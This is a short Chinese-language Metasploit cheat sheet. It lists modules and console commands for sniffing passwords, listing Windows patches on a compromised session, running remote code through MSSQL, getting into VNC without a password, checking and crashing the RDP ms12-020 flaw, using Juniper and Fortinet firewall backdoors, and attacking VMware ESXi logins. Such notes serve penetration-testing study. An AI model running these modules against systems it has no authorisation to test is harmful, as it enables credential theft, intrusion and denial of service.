密码嗅探 auxiliary/sniffer/psnuffle
msf > use auxiliary/sniffer/psnuffle
msf auxiliary(psnuffle) > run 直接run是实时在线的嗅探
msf auxiliary(psnuffle) > jobs
msf auxiliary(psnuffle) > kill 0 杀死job 0
msf auxiliary(psnuffle) > set pcapfile /root/ftp.pcap 可以提取pcap文件中的账号密码
查看系统补丁
msf > use post/windows/gather/enum_patches
msf post(enum_patches) > set session 0 基于已经获得的session进行检测
msf post(enum_patches) > run
Mssql端口探测和远程代码执行
sql server的端口。TCP 1433端口/动态端口,UDP 1434端口
auxiliary/scanner/mssql/mssql_ping 通过UDP1434端口来查询TCP动态端口
auxiliary/admin/mssql/mssql_exec 远程代码执行
VNC 无密码访问
auxiliary/scanner/vnc/vnc_none_auth
RDP远程桌面漏洞(ms12-020)
auxiliary/scanner/rdp/ms12_020_check 不会造成蓝屏DOS
auxiliary/dos/windows/rdp/ms12_020_maxchannelids 会造成蓝屏DOS
防火墙设备后门
auxiliary/scanner/ssh/juniper_backdoor 防火墙是juniper,而且开了ssh,可以使用万能密码登录
auxiliary/scanner/ssh/fortinet_backdoor
Vmvare ESXi
Vmvare ESXi是可以直接管理服务器的虚拟主机平台。
auxiliary/scanner/vmware/vmauthd_login
auxiliary/scanner/vmware/vmware_enum_vms
